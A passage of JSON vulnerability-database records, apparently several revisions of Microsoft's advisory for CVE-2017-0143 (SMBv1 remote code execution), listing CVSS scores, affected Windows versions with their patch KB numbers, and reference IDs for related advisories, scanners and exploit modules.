"kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T08:53:53", "differentElements": ["msAffectedSoftware"], "edition": 78}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-28T22:45:57", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012216", "KB3210721", "KB4012598", "KB4013198", "KB4012217", "KB3210720", "KB4012606", "KB3212646", "KB3205401", "KB4012214", "KB4012215", "KB4012212", "KB4012213", "KB3205409", "KBMS16-110, 3187754", "KB3213986", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-28T22:45:57", "differentElements": ["msAffectedSoftware"], "edition": 79}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-29T08:51:23", "history": [], "viewCount": 10, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-28T08:53:53", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-28T08:53:53", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB3212646", "KB4012216", "KB4012214", "KB4012213", "KB3205401", "KB3177186", "KB4012212", "KB3210720", "KB3210721", "KB4012217", "KB3205409", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB4012598", "KB3213986", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
